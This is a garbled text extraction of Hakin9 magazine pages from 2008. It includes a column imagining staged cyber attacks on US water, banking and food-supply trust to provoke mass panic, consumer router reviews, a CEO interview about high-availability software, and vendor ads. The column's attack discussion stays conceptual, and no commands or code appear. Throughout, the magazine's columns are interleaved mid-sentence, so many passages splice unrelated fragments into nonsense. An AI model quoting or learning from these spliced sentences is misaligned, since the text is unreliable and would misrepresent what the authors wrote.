Intelligence Analyst and trainer at Open Technology • MD5 Group, http://www.otg-nc.com. He has written for • SHA publications that includes, among others: Sys-Admin, Hakin9, PHP Magazine, PHP Solutions and the O’Reilly • Symmetric-key webportal. Robert is the maintainer of of pg_live, a Linux • Salt (http://en.wikipedia.org/wiki/Salt_(cryptography) live CD distro designed to profile PostgreSQL for first time users, which is used throughout the world in trade shows, conferences and training centers.66 HAKIN9 4/2008 4/2008 HAKIN9 67 EMERGING THREATS Global Thermonuclear War – Shall We Play a Game? MATTHEW JONKMANThere's a movie I think everyone in the security world has likely seen. Wargames, Matthew Broderick as a teenager that accidentally builds a relationship with WOPR and nearly triggers a nuclear strike because humans relied too heavily on machines. lassic American cold war scare description? Let's consider an attack by If this organization's goal is to cause movie from the 80's that may have a small but technically adept extremist harm to the economy and citizens of it's C been one of those movies that set organization against the United States. target country but hasn't the resources a lot of us on the road to computers and Many scenarios have been explored for a conventional attack or even a large security. both publicly and privately, and there are scale terrorist attack, there are many I recently watched that movie again very talented folks monitoring our internal possible cyber scenarios. The classic with my kids and found it just as fun as and external network traffic looking for denial of service attacks against major it was 10 years ago. It got me thinking signs of these attacks. We can surely ISPs and banking providers as seen in about what the current equivalent national assume that constant probing and Estonia is not the most effective option. warfare might be short of conventional exploration of US networks are going on Estonia is still there and still has a conflict. just as fervently as the US is probing and functioning economy, and did not suffer Consider the recent examples of exploring the networks of it's enemies measurable physical casualties as a Estonia being DDoS'd into national and allies. More of a threat is the non- result of these attacks. paralysis. If their attackers' goal was to do state connected organization for several The number of targets that would damage to the country, it's infrastructure, reasons. have to be saturated in the US in order to and even to cause harm to citizens, was A non-state sponsored organization cause an actual breakdown of financial the attack perpetrated the most effective has significant advantages. They can operations is also far too large. There are choice? Or was this just a knee-jerk act operate without restraints imposed by a too many non-publicly accessible lines of vandalism intended to just get some political and diplomatic set of norms and that keep the US financial infrastructure headlines? What would have been a more rules. Operatives can probe and explore operating to do any real damage from effective attack? from anywhere in the world, and if caught the outside. And while an attacker may be Global Thermonuclear War. That's or investigated are expendable likely not able to slow down or make inaccessible not a real option if you intend to leading to the organization as a whole. online banking for a number of the larger do harm to just one national entity. This organization also has the added organizations, this does not constitute a The environmental impacts are too advantage of not having to alert the target significant threat. There may be some widespread and the reaction of any nation of it's intentions via a declaration of public panic, but no real impact on nuclear armed state is too drastic to war or a declining diplomatic relationship. national financial operations. Online consider. Lets consider then a scenario Most importantly, this smaller group may banking is very convenient, but in no way where a superpower that is the target operate without any specific goals or is it critical to the US national economic of many extremist organizations, rogue desired outcomes other than to cause infrastructure. states, and intelligence agencies discomfort for it's target. Thus anything is a Would one target the centers of around the world. Hmmm... who fit's that possible tool. trading? Wall Street, NASDAQ and other 68 HAKIN9 4/2008 4/2008 HAKIN9 69 EMERGING THREATS electronic exchanges? Fewer targets yet long been known that the most under and emails to the major media outlets still a significant potential impact. Even protected yet most critical resources taking credit for large scale biological a very effective DDoS might be able to of most every developed nation are it's attacks against food supplies already disrupt operations to some small degree, water supply, transportation, and electrical delivered. More chaos and public panic. At but in the worst case the markets could transmission systems. Part of the issue, this point the attacker would only need to easily suspend trading for days without especially in the US is that each of these announce the threat. significant financial impact as has systems are not viewed as significant This scenario could be taken much happened during significant market panic targets by the local municipalities that farther with other relatively low impact situations. It would be in the news, definitely operate them. And while these local attacks that imply more significant a headline grabbing stunt, but the actual operators are certainly experts in their attack capabilities that do not exist. repercussions would be minimal and the chosen field, very few employ effective The public panic would be the actual law enforcement resources mustered experts in cyber-warfare able to effective weapon to cause damage. Humans to find the attackers would be difficult to secure and protect those systems. There revert to a survival mode very quickly evade. is no centralized national entity that when threatened. The current state of What if the attacker were to threaten operates and secures these facilities in mass media in the US and many other to take down NASDAQ and a couple most countries. Each is done as the local developed nations would only amplify major banks online banking at a certain government sees fit and can afford within these attacks ten-fold with rumor time? This is something the average a set of rather broad guidelines. mongering, sensationalist reporting, and botnet might be able to pull off, ironically Water first; local water treatment and expert commentators that are very often using the infected PCs of the country's delivery systems are an absolutely critical just plain wrong seeking to grab ratings. own users trying to use the infrastructure system to every city in any nation. In the What impact then might we expect being taken down. These threats if US these are often small organizations from this type of a scenario? The original made public before hand and effectively using computer-based automation goal was to cause harm to the economy executed would give this organization systems that are generally running and citizens of the target country. The the ability to invoke significant levels of on Windows, and often on desktop resulting panic would certainly cause harm panic in subsequent announcements grade hardware. More dangerously, to citizens. Certainly there might be injuries and attacks. Making a population panic these systems are often networked and casualties from panic induced riots is perhaps the most effective weapon without consideration of the possible over supplies and resources. Economically available. ramifications. Add to this the likelihood that it would not be unexpected to have days Taking this scenario further, lets say they're not patched on a regular basis to or weeks of lost productivity, and a very that same group were to next threaten avoid disruption of automated processes, significant drop in confidence in both to disclose credit card numbers and or possible incompatibilities with running financial institutions and in the shared personal information of thousands or software. electronic infrastructure. millions of target citizens. With the results If an attacker were to cripple water My point then is this: While many of the first threatened attacks being treatment and delivery systems in a modern nations have incredible successful, just the threat of disclosing few high profile cities in arid and desert infrastructures to make our global credit card numbers would begin to induce climates where water shortages can cause economy operate, we are still most a panic. The attackers would only have to real and immediate problems, residents vulnerable at the human level. Any actually disclose a smaller number than of other cities would begin to panic. professional penetration tester will attest threatened, conveniently using information This attack would be many times more that no matter how secure electronically an stripped from the owners of the bots they'd effective in the light of the previous phases organization might be, 80% of the time that just used to execute the first attack. threats being acted upon if this attack is same attacker could walk up to the front Banking institutions would have to also announced prior to execution. Many door with a delivery uniform and walk out immediately cancel and reissue these would begin to hoard water adding spike with the server containing the information disclosed cards. This is a minimal impact, loads to all systems across the country. they couldn't reach electronically. We must but the perceived threat by all users could Possible runs on retail water supplies, and continue to consider our core weaknesses cause both runs on banks as users would the potential for violence as supplies are for every organization and resource we seek to obtain hard currency and runs of stretched. strive to protect, Humans Make Mistakes. users wishing to cancel and reissue their The next stage of an effective attack Reliably! non-compromised cards. The stress on might then be to attack the public Please send in feedback and comments the banking system would certainly be trust in the food supply. Well placed to the author at jonkman@emergingthreats.net. significant, although not enough to topple rumors about contaminated supplies of And take a few minutes to visit our new or cripple the system for more than hours meat, vegetables, and other mainstays project and test our rulesets at at a time. would add to the general panic. The www.emergingthreats.net. Do not forget For the next phase in this attack media would quickly feed the fires with our Firewall rules as well at let's consider public infrastructure. It's conspiracy theories. Add to this with calls www.emergingthreats.net/fwrules/.68 HAKIN9 4/2008 4/2008 HAKIN9 69 CONSUMERS TEST CHOOSE THE RIGHT ROUTER Choose the Right Router f you accept the tubes or pipes impending failure and take over routing It is quite common to set up a router, and analogy of the Internet, then routers functions smoothly so network traffic is not if no changes are made to the links up or I are essentially the fittings and valves delayed. Most often routers are thought of as down stream, simply forget about it... Until it in the pipes of the Internet. Since their appliances. There are many name brands fails. Appliance or PC, your router still runs on invention, their underlying principle is largely on the market: Alcatel, Cisco, Juniper, Linksys, software, and there will be security exploits unchanged: Netgear to name just a few from enterprise to take advantage of your router's underlying A router takes traffic from one network class down to home user class. OS and programming. So, as with everything and relays it to connected networks on a path Less obviously, any computing platform else in the network, you will have to establish toward each packet's destination network. with two network interfaces can be a method for keeping current with software Over time many additional functions configured as a router commonly using updates and security patches. Be prepared have been added: Routers can analyze Linux or BSD, or less often Windows or for routing appliances to require a system packets in transit. They can be configured OSX. In fact the LiveCD included with this restart to take advantage of most patches. to block or allow certain types of traffic magazine can turn your computer into a If you already have a systems between particular hosts or whole router with just a few simple commands management system or approach, you networks. Routers can also be used to – just look at any of several references to will want to make sure that the router you prioritize particular packets ahead of others conducting man-in-the-middle attacks, or choose can be integrated into that system. in queue for transmission. (the command sharing your network connection over WiFi. As the gateway into (and out of) your structure for achieving this is usually called In the enterprise world, a name brand is network, the router is in the best seat in the an access control list or ACL) often though to be the best (or only) choice, house to watch for attacks and breaches. Routers can modify packets in transit. but by giving up the easily defended good You will want to have some form of logging They can be configured to change packet decision of buying an appliance, a network and log analysis to give you early warning sizes in order to optimize transmission over engineer can gain greater flexibility and of suspicious events. some networks. A router may be used to reduced price by building a PC or Server by Matthew Sabin mask the origin host or network for certain into a routing platform. packets. An administrator may program Deciding which brand and model, or a router to direct incoming packets to an whether to build your own, will require a Netgear Router alternate destination. If your network uses thorough understanding of which routing using 802.11 b/g protocol network address translation (or NAT) you functions you will need, and also how many My recent experience is with a Netgear are using some of these features. ports and how much traffic you will need. Router using 802.11 b/g protocol. This router A router can be programmed to encrypt The concepts involved in router was chosen for home networking as a packets in transit in order to protect their programming are fairly universal – there compromise between good quality and contents from prying eyes on the open are only so many commands required reasonable cost. It was not the top of the line network. One of the most common uses to implement the functions of a router. Yet router from this company but it was far from for this feature is for building virtual private each appliance vendor has used their the worst. I have troubleshooted Linksys and networks (VPNs) over the public Internet. own unique syntax and structure. The Netgear routers mostly. Linksys routers were Finally routers are often able to analyze differences are largely just syntactic, so a more commonly used by the customers network connections and topology. This skilled programmer of Cisco routers for I had worked with but the IP technician allows for packets to be diverted on other example can fairly readily pick up the Alcatel who wired the cable connection had paths if a link or remote router appears to be programming method. In the build-you-own recommended Netgear so it was chosen. saturated or down. Further a "spare" router world, the differences can be broader, but My father likes the mobility of wireless can monitor a production router to detect again the concepts remain the same. with his laptop and it is a benefit to him in 70 HAKIN9 4/2008 4/2008 HAKIN9 71 CONSUMERS TEST CHOOSE THE RIGHT ROUTER his large home. I live in an apartment and the other hand I had some problems while I prefer the advantage of 100 mbps speed using it. The unit has hung a total of about Cisco 3700 & Cisco 1130 with a wired Ethernet line (giving me much 3/4 times in as many years. Unfortunately Typically my work does not end when I get faster downloads) compared to a maximum the firmware version of the WRT54G and new home so I happen to use several routers of 54 mbps speed that my father receives. I models do not all support flashing. I would (most for testing and some for actual can also quickly configure a wireless card in mostly recommended to anyone buying a connectivity). My current router right now is a hotel or hotspot if necessary. There were broadband router/wireless AP to investigate it a Cisco 3700 router for my hard line and many hang-ups, problems using the router if can be flashed with a different firmware. Not a Cisco 1130 Wireless Access Point for at first. The biggest ones were simple user only is it easy in most cases but in nearly all my wireless users. I went with this router error – not disconnecting and reconnecting cases it will provide you with so much more because I got several products from cables or restarting power to the modem, additional features that will greatly benefit you. Cisco and know their quality to be top router and computer when hardware was notch. The routers are made for enterprise added or removed or when configurations Notes: environments meaning they support a full were adjusted; windows errors when list of options that can be configured. I am configurations did not match between the • Quality/price: Best 50 euro I've spent able to have full control over any traffic that router data page and the adapter software • Effectiveness: Does exactly what I need leaves or comes into my network and this including WEP security keys; deciding it to do has proven to be helpful countless of times. whether to use the built in windows software • Final: Don't buy Netgear, D-link aren't Before I used my Cisco router I was using for wireless configuration or the CD provided great. If it has wireless investigate better just a simple Linksys wireless router w/ with the adapter and making the chosen one antennas cable modem built in. I had used plenty of work; making the decision to use adapters Cisco routers both at work and at school instead of PCMCIA cards and ensuring that by Conor Quigley so I knew what I was getting into when I the wire antennas they used were positioned switched. I changed mostly because of the properly to receive the signal. Wading through finer control I could get out of the router. It the array of Internet literature and the on-line Cisco also helped me to prepare for my up and router and adapter manuals to correct the We use Cisco and Juniper products in coming Cisco certifications. connection and speed problems. our company. Cisco is the market leader, I do a lot of testing so I actually own a I had great results with the router so provides the advanced features we require, couple routers. That being said, I choose I would definitely buy products from this a roadmap for new features and excellent the 3700 over the rest of them because it company again but if I buy or recommend support infrastructures. We use some was the newest. It has the most up to date a new router it would be a newer model Juniper routers, but Cisco was a better fit. IOS and that provides me with the extra with current technology. IT equipment We did a long technical review of various functionality I was looking for. advances and price reductions occur so products and Cisco won out. Cisco routers/ This product has helped me immensely swiftly as we know from Moore’s Law about switches are nice, especially when you have at work. I am now able to go home and processor speed, that after six months I lots – everything is easier to manage and demo out something I may have been would never buy the same hardware. maintain. We have been using Cisco for working on at work. When I go in the next years so our staff are comfortable using the day I will already know the solution and Notes: equipment and it is somewhat easy to find that in itself saves a vast amount of time. Cisco certified engineers. Its also great because I am able to test out • Quality/price: 8.0 For we have 100s of router/switches new solutions in a non-production area. • Effectiveness: 8.0 so the breakdowns happen but Cisco TAC Doing the trial and error at home means • Final Note: 8.0 generally fix/replace when it is needed I don't have to do it when it comes to the or we have to find workarounds. The only real thing. The only bad thing about this by Monroe Dowling weak point about Cisco is the cost which router is that they are typically expensive may not suit everyone, but its core to our and to get the fullest feature set you need business so its worth it. to have an account with Cisco. However, Linksys WRT54G Version 2 there are plenty of routers on e-bay that are I am using Linksys WRT54G Version 2 router. Notes: pretty cheap and I recommend for anyone I have chosen this one because it was able looking to gain some practice with Cisco to flash it with dd-wrt which is a Linux port • Quality/price: 10.0 and a production environment to put out that provided a lot of additional functionality. • Effectiveness: 10.0 the extra cash. I did not have any hang ups I have been using Netgear before but to be • Final Note: We have spent over 2 at all. I am used to working with the routers honest it was crap and in no way had the million Euro on Cisco equipment this at work so it made for a simple transition. same functionality that the Linksys does. My year, so we are happy for the moment. The only thing I had to do was call my ISP Linksys router can ssh to my home router/AP because there were issues on their end and perform WOL to LAN machines. On by Network engineer at ISP once everything was up on mine. I would 70 HAKIN9 4/2008 4/2008 HAKIN9 71 CONSUMERS TEST CHOOSE THE RIGHT ROUTER certainly choose this router again. As time on the router that checks for sync and goes on I may replace it for a newer model, Solwise SAR-600EW reboots if the connection drops I find that I but Cisco is where my choice will be. Its a I chose this product as I was impressed have few problems. excellent small business solution, great way with the review of it on RouterTech.org I would recommend this to others. to practice and fun to have. and happy that I would be dealing with Admittedly I chose this router to allow me a company I could trust. Also I knew to play with the config and perhaps the Notes: that it would be compatible with the new average home user doesn't want or need RouterTech custom firmware which meant to do this, however the platform is solid and • Quality/Price: 7.0 (high price, rock solid that I could continue to test firmware reliable at a good price. quality though) changes and to help support the platform • Effectiveness: 10.0 in the forums. Notes: • Final: 8.5 I have used several other routers over the last few years. My first one was • Quality/price: 9.0 – the SAR600EW cost by Brandon Dixon, Information Systems a Safecom ASR-8400 which worked well me about £30 which was a good price Security Engineer once a different vendors firmware was for a wireless router in my mind installed. I needed to move to a Wireless • Effectiveness: 9.0 – the router does router so changed to a Billion 7402VGP exactly what I would expect it to do Wifi and 100mbit Ethernet as I was keen to try the built in VoIP • Final: 9.0 – the Solwise SAR600EW Wifi was needed for iPod devices. Thus, functionality in that router. Unfortunately is a good router at a good price. The we set out to a big electronics superstore the router was unstable despite being GPL based firmware platform means to find a box as cheap as possible – at on the most recent firmware, the wirless that there is scope to improve the our companies, we do not believe in lavish performance was eratic and the VoIP functionality beyond the manufacturer spending. We have used Surecom EP4904 quality poor. Billion were always just about delivered and if you do turn it into an previously. We resigned from it due to lack to release a firmware to fix the issues but unrecoverable brick (although this is of WiFi – the box had no WiFi transmitter. I got fed up of waiting. At about this time unlikely) the cost is not so high that you We looked at a variety of other routers (two years ago) the RouterTech.org site can't replace it quickly and easily. (including Gigabit ones). However, none was setup and I got back into contact of them were worth the extra price. We do with the guys who were so involved in the by Sy Borg at RouterTech.org not have large amounts of data on our ADSLTech/Safecom support a few years network, so Gigabit didn't pay. ago. I found out about the GPL firmware As for extra router features: no need for that was being developed and so given my Cisco 2801 these as we have a dedicated server in the annoyance with the Billion router I chose to When I begun my career as security office. Complicated implementation of WiFi buy a new Safecom SWAMR-54125. This manager I decided to use the Cisco access control on MAC base – needs to router worked well for me for a year and products. As years were passing I started be disabled to add a new device to the filter a half but appears have had a hardware employing also the Open Source products. list. This makes adding new review devices failure fairly recently which prompted me to I chose Cisco 2801 router for being one difficult and annoying. However, as we can move to the Solwise SAR600EW. of the best scalable products on the market. just run WPA due to device limitations, we I've not bothered looking at any routers Cisco has produced routers ever since need the MAC filter for an extra bit of safety. beyond the ones above. These AR7 chipset and provides a great line of products from Somewhat problematic range. We have based routers have performed well for home to core edge products. What I really a nice 80m2 office – and cannot use the me and meet all of my functional needs appreciated at that time was the support WiFi properly with our mobile boxen in (especially with custom firmware on). I and the security concern Cisco offers. other rooms. A strong receptor definitely work from home sometimes and use a When working for an enterprise you is needed... We haven't experienced any VPN client to connect to the office. The have to use everything the management breakdowns yet. All worked fine so far! I SAR600EW allows for easy port forwarding buys. I used many brands like Juniper, D- would recommend the device to the others! rules to open up connections and gives the link, Extreme, Netgear, to name a few, but If you do not need an advanced, fancy router stability you need when sharing screens finally I manged to convince them to switch. – get this box definitely! etc with work colleagues. I couldn't have a single vision of the whole The only issues I have is with the quality network due to the poor integration of the Notes: of my ADSL line. I have high attenuation other products. numbers and find that my SNR margins I used to employ Juniper some • Quality/price: 8.5 fall in the evenings and occasionally I lose time ago, but found their command line • Effectiveness: 9.5 sync. The SAR600EW maintains sync far language more complicated than Cisco's. • Final: 9.0 better than the SWAMR54125 did (partly The router I am currently using is one perhaps to later dsp drivers as part of the of the best scalable and modular solutions by Tam Hanna, Tamoggemon RouterTech firmware) and with functionality I know, with a great support and a group 72 HAKIN9 4/2008 4/2008 HAKIN9 73 CONSUMERS TEST CHOOSE THE RIGHT ROUTER of Cisco engineers who help to tailor the • I can go downstairs still having a good linksys AP. I’ve been using BSD (FreeBSD, solution to our needs. QoS then OpenBSD) for over 9 years. I change The weakest point is the price which • Proxy server feature my home routers to test out new things. is often higher than the cost of other • Encryption feature (WEP 64/128 bits) It’s been OpenBSD for quite a while and solutions, however, if you are in favour of a • Dynamic/Static Routing I doubt that will change anytime soon. quality-price rule it is not so important. • Multicast I’ve looked at Mikrotik RouterOS and its In the last few years I have had no • NAT feature associated hardware and will be using it breakdowns whatsoever. Sometimes before • Ping test on a clients project in the future. the 2000 we had some strange behaviours • DHCP configuration OpenBSD, as I’m sure you’re aware, in our network. The customer service • D-LINK has excellent support (helpdesk) is an excellent network device; providing resolved all the problems immediately and both a world class firewall in PF, and in a very professional manner. Weak points: fastly maturing routing daemons such Human mistakes like misconfiguration as OpenBGPd, OpenOSPFd, and layer 7 or misunderstanding of the whole features of • The web-based Manager has a poor features such as relayd. the router still happen sometimes obviously. interface There was a bit of a learning curve Cisco is a valuable brand and they • Few updates for the interface as well as getting read only mounts right, and make modular routers with very useful technical manuals squeezing the required stuff into a small features like network admission control. • Password manager that should be CF card (now negated by vastly larger and You can have security policy compliance, easier (I think of the beginners out there) cheaper flash memory). mitigation of viruses, worms plus • The reset button on the rear panel isn’t unauthorized access control. easy to reach with a pen (very annoying) Notes: • If you have a big house you must Notes: change the antenna on the rear panel • Quality/price: 10.0 especially with large walls • Effectiveness: 10.0 • Quality/price: 8.0 • The antenna offered within the package • Final: 10.0 • Effectiveness: 10.0 – when you work has a poor range for a big house. If you as system integrator for an enterprises are downstairs for example you might by Aaron Glenn effectiveness and a very fast support encounter connection problems. I had to are important. Cisco offers all of the change it, D-link could manage to offer features needed for the successful something a little better even for this price Netgear DG834g enterprise networking. I chose this model following extremely • Final: 10.0 Another thing is that the router is very positive opinions it got on numerous dependant on temperature: I have technical forums. I used a Digicom router by Antonio Stano experienced problems during the before but immediately resigned. Its speed summertime. The ADSL Led was and performance turned out to be really sometimes off and I had to reset the device disappointing. D-LINK DSL-G604T and re-enter my connection settings. The other routers that I had taken I needed a wireless ADSL router with high D-LINK DSL-G604T is a good choice into consideration had exactly the same speed connection for the home use. for a small office or home use. I have been features but cost much more. Speed: 54 Mbits/s. using it for 3 years now and I must say that DG834g is easy to configure and has On the rear panel – Power 7.5 CD 1.5 it works well fro most of the time. no defects that would hamper the proper A; ADSL Port; 4 Ethernet Ports. functioning of a small network. I have had On the front panel – 4 LED indicators Notes: no problems so far which does not happen (WLAN: for Wifi; ADSL; Status; Power). too often if it is about networking. I was searching for a modem/router • Quality/price : 8.0 I recommend this router to all users having these features since I had several • Effectiveness : 6.0 because of a moderate cost and a very machines to connect. • Final: 7.0 good quality. I used a D-LINK modem with only 1 Ethernet Port before. I decided to change by Tony Deslandes Notes: since I was moving to a much bigger space. My ISP offered a package with his own • Quality/price: 10.0 modem/router but as a student, I couldn’t OpenBSD • Effectiveness: 10.0 afford it (more than $150) at that time. D- I am a network engineer by trade and have • Final: 10.0 LINK DSL-G604T features were identical for 5 years professional experience. less than 100$ so I chose this one. I have a number of soekris OpenBSD by Giuseppe Caristia Strong points: boxes at home; in addition to a dd-wrt 72 HAKIN9 4/2008 4/2008 HAKIN9 73 INTERVIEW INTERVIEW WITH NICOLAAS VLOK A conversation with Vision Solutions, Inc. President and Chief Executive Officer, Mr. Nicolaas VlokChanging challenges to opportunities, Nicolaas Vlok is leading Vision Solutions to become an unprecedented force within today’s information availability industry by providing business continuity solutions to customers around the world.You began your career in computers What obstacles have you encountered I do and I do not. I have surrounded at an early age of 14. What drew throughout your IT career and what have myself with pretty good business you to work in IT security in the risk you learned? people that are better experts in their assessment field? Challenges and obstacles are encountered field than what I am in their respective Originally, it was more a hobby. I was on a daily basis. One thing you learn areas... that by the way is the secret to interested in electronics and gadgets working in technology is that change success. During normal day- to-day since receiving my first computer, which is constant and you have to deal with it activities and operations of the company, grew to the point of in-depth knowledge of quickly. What is great today is outdated I spend a great deal of my time running technology and its components. Eventually, tomorrow; especially in the software world. the business; however, on weekends I I began looking after systems within some Innovation is key to survival and that is spend time reading and playing a little of my dad’s businesses. When you really why R&D is so important. Even today, bit with technology. My background is enjoy doing something, even if it takes great we spend more than 20 percent of our rather technical, which I believe helps me effort or time, you stick with it – that's the revenues on R&D. What I have learned understand the marketplace, the shifts in case with technology and computers for boils down to three words... innovate or die. the marketplace, and also the direction me. Even today, I still spend time after hours Growing Vision Solutions from 15 million in of our company. I will call myself fortunate tinkering and keeping abreast of what is revenue to more than 100 million means to have both operational and technical happening in the marketplace in general. changes in the competitive environment. experience and have the opportunity Overall, work is a lot more enjoyable if it I’m impressed with the company’s ability to apply it in my business. After all, we is something you can be excited about to compete and execute, as well as the are still a very technical business... our every morning. As for what drew me into ability to get access to capital at the right technology lives just above the operating high availability, data management, and cost and time to invest and fuel growth. system, and it's tightly integrated business continuity, I became a hardware Along the way, I’ve learned from those who middleware. and networking consultant early in my have done it before and I’m grateful for career – which also led me to third party the trusted group around me from where Where do you see the industry heading distribution and eventually software I draw on experience and expertise. You in the next 5-10 years? development. Eventually, I ended up owning have to believe in what you are doing and People around the world expect several businesses, of which one was a building a software business is not for the information to be available any time company in South Africa that distributed faint-hearted. You must have the will and they want to access it, no matter where high availability software and through strength to continue forward. they are. They don't care how it's being that business, I learned more about the made available to them, they just want overall business continuity market and also As a CEO do you miss the technical side it now. This places enormous pressure business in general. of your career? on businesses and IT operations. Within 74 HAKIN9 4/2008 4/2008 HAKIN9 75 INTERVIEW WITH NICOLAAS VLOK our marketplace, we provide business with this consolidation taking place an ever growing threat to organizations. continuity and high availability software. because they can rely on our technology What can companies do to prepare It's hard to predict ten years out because to minimize the risk. themselves from a full fledge disaster? a lot changes in ten years; however, I'm The next driver is increased Well, you can distinguish between planned comfortable saying that within the next five Regulation. From a regulatory perspective, downtime and unplanned downtime. years we will witness a higher demand for there are significantly higher levels of Gartner estimates that more than 80% of information availability with 24/7 downtime is actually access. Those meeting these planned. So you demands will excel ultimately would do well to take because the world is shrinking planned downtime to a global village. If you're into consideration. travelling abroad and you want System upgrades, to do your banking, you do not hardware upgrades, want to see systems down applications upgrades, due to maintenance. Real-life situations compliance. Let's say Sarbanes Oxley database upgrades, backups, and still happen every day where systems wherein you must keep track of a whole bringing new hardware on-line can all be shut down for planned maintenance lot more in terms of what is happening anticipated. However, when you look at or unplanned downtime but this is in your database; who accessed it, who unplanned downtime,the major risks are increasingly becoming unacceptable. deleted what. It boils down to more due to the geopolitical landscapes and Also, server technology, networks and, storage again at the end of a day. This is unexpected disasters – a company can storage will all become more unified a big play for us. loose its ability to recovery in case of a as a solution. You'll be able to do more Thirdly, the changing of the world in fire or terrorist attack or a flood etc. The remotely which will drive up the need for terms of everyone is connected. Global unplanned side is also unique by industry 24/7 availability. Plus, reliance on real-time customers have systems based in as it depends on what the requirements access is going to be quite a bit more different continents, which manage large are – organizations are at different risks than it is today. amounts of data between places like in different parts of the world. The bottom China and a sales team on the other line is that you want to protect your data What is your number #1 customer side of the world. In today’s world, there is no matter what while also making it concern as it relates to High Availability no such thing as a long backup window. available 24/7. and security today? It is shrinking and you have to do more If a company replicates within the same with less time. So the connected world is What are the things that you see location environment, data sent from one changing the whole concept of downtime companies doing wrong the most machine to another, in real time, must be and availability quite quickly. when preparing for High Availability or encrypted. Most organizations handle WAN Disaster Recovery? encryption through networking hardware, What makes your products so unique in Believe that downtime will not happen to me. but the question is how secure is their LAN comparison to the other solutions that environment? are currently available? What are your thoughts on virtualization We are focused on IBM’s Power Systems and Network Storage? Are these Over the last few years, many platform (System i [i5/OIS] and System p technologies that you are currently companies have seen their data [AIX]) which is a processor platform IBM looking at? repositories grow to terabytes and co-developed with some other leading Yes, we already assist with distributing beyond. Do you feel that the High industry players. We are expanding from workload across systems. I believe we Availability/Disaster Recovery market is our traditional markets into the UNIX have only seen the tip of the iceberg. keeping up with this trend? market at a pretty fast pace. But our I think a lot is going to happen in the Very much so; in fact, I believe it may be uniqueness is underscored by the fact storage virtualization world – it’s a very one of the driving factors. that we have about 90% market-share exciting play. And although it is too early There are three drivers for the overall today. We are the only player with global to speak of maturing trends, the one that concept of high availability disaster support and distribution represented on has been around for a while is server recovery. The first is Consolidation – all the continents, either directly or through virtualization. The new way is desktop – people are installing bigger systems partners. And our technology spans from virtualization – some would argue it consolidating more work load on each SMB right through high-end enterprise – is even a bigger market than server system. The critical point of failure is the – we have a proven reputation that virtualization. Many people do not think system with large data repositories, which continues to increase. of storage virtualization as a big play, but means more storage and keeping them I believe given the growth in the storage highly available is of a great importance Major disasters, natural disasters, world, it’s going to be very significant for business. We play well into data centres terrorist attacks, cracker attacks are throughout the next 5 years.74 HAKIN9 4/2008 4/2008 HAKIN9 75 EXCLUSIVE&PRO CLUBZero Day Consulting Digital Armaments ZDC specializes in penetration testing, hac- The corporate goal of Digital Armaments is king, and forensics for medium to large organi- Defense in Information Security. Digital arma- zations. We pride ourselves in providing comments believes in information sharing and is prehensive reporting and mitigation to assist in leader in the 0day market. Digital Armaments meeting the toughest of compliance and regu- provides a package of unique Intelligence se- latory standards. rvice, including the possibility to get exclusive access to specific vulnerabilities. bcausey@zerodayconsulting.com www.digitalarmaments.comEltima Software First Base Technologies Eltima Software is a software Development We have provided pragmatic, vendor-neutral in- Company, specializing primarily in serial com- formation security testing services since 1989. munication, security and flash software. We We understand every element of networks - develop solutions for serial and virtual commu- hardware, software and protocols - and com- nication, implementing both into our software. bine ethical hacking techniques with vulnerabi- Among our other products are monitoring so- lity scanning and ISO 27001 to give you a truly lutions, system utilities, Java tools and softwa- comprehensive review of business risks. re for mobile phones. web address: http://www.eltima.com e-mail: info@eltima.com www.firstbase.co.uk@ Mediaservice.net @ PSS Srl @ Mediaservice.net is a European vendor- @ PSS is a consulting company focused on neutral company for IT Security Testing. Fo- Computer Forensics: classic IT assets (se- unded in 1997, through our internal Tiger Te- rvers, workstations) up to the latest smartpho- am we offer security services (Proactive Se- nes analysis. Andrea Ghirardini, founder, has curity, ISECOM Security Training Authority been the first CISSP in his country, author of for the OSSTMM methodology), supplying an many C.F. publications, owning a deep C.F. extremely rare professional security consul- cases background, both for LEAs and the pri- ting approach. vate sector. e-mail: info@mediaservice.net e-mail: info@pss.netPriveon MacScan Priveon offers complete security lifecycle se- MacScan detects, isolates and removes spy- rvices – Consulting, Implementation, Support, ware from the Macintosh. Audit and Training. Through extensive field Clean up Internet clutter, now detects over experience of our expert staff we maintain a 8000 blacklisted cookies. positive reinforcement loop between practices Download your free trial from: to provide our customers with the latest infor- http://macscan.securemac.com/ mation and services. http://www.priveon.com http://blog.priveonlabs.com/ e-mail: macsec@securemac.comEXCLUSIVE&PRO CLUB EXCLUSIVE&PRO CLUBNETIKUS.NET ltd Heorot.net NETIKUS.NET ltd offers freeware tools and Heorot.net provides training for penetration te- EventSentry, a comprehensive monitoring so- sters of all skill levels. Developer of the De- lution built around the windows event log and ICE.net PenTest LiveCDs, we have been in log files. The latest version of EventSentry al- the information security industry since 1990. so monitors various aspects of system health, We offer free, online, on-site, and regional tra- for example performance monitoring. Event- ining courses that can help you improve your Sentry has received numerous awards and is managerial and PenTest skills. competitively priced. http://www.netikus.net www.Heorot.net http://www.eventsentry.com e-mail: contact@heorot.netElcomSoft Co. Ltd Lomin Security ElcomSoft is a Russian software developer Lomin Security is a Computer Network Defen- specializing in system security and password se company developing innovative ideas with recovery software. Our programs allow to re- the strength and courage to defend. Lomin cover passwords to 100+ applications incl. MS Security specializes in OSSIM and other open Office 2007 apps, PDF files, PGP, Oracle and source solutions. Lomin Security builds and UNIX passwords. ElcomSoft tools are used by customizes tools for corporate and govern- most of the Fortune 500 corporations, military, ment use for private or public use. governments, and all major accounting firms. tel:703-860-0931 www.elcomsoft.com http://www.lomin.com e-mail:info@elcomsoft.com mailto:info@lomin.comJOIN OUR EXCLUSIVE CLUB AND GET: l hakin9 one year subscription l classified ad for duration of your subscription l discount on advertisingYou wish to have an ad here? Join our EXLUSIVE&PRO CLUB! For more info e-mail us at en@hakin9.org or go to www.buyitpress.com/enEXCLUSIVE&PRO CLUB SELF EXPOSUREWhere did you get you first PC from? What are you plans for future? The first PC that I could call my own was a white I believe I can still make a tremendous amount box 286 with a grayscale Hercules monitor. I of impact at Microsoft in the security space. upgraded it with a modem and was all over the Although we have made progress, there is still bbs scene and used Prodigy as my ISP. much to be done. Our Forefront security business is growing considerably and I would like to see What was your first IT-related job? more success for Microsoft in this space. My first real job was at the UCLA Medical Center as a programmer/systems administrator while What you think will be the greatest pain in IT I was in school. I learned a great deal and owe Security professionals' job in the nearest future? much to a few people that worked there. What should they focus on in the first place? I think there is a shift occurring that deeply affects IT Mike Chan Who is your IT guru and why? Security professionals. IT budgets and the amounts Senior Product Manager I have to admit, I do not have one. There are many dedicated to security are not growing as quickly in the Forefront group individuals I go to for information and knowledge, as they used to. Striking the 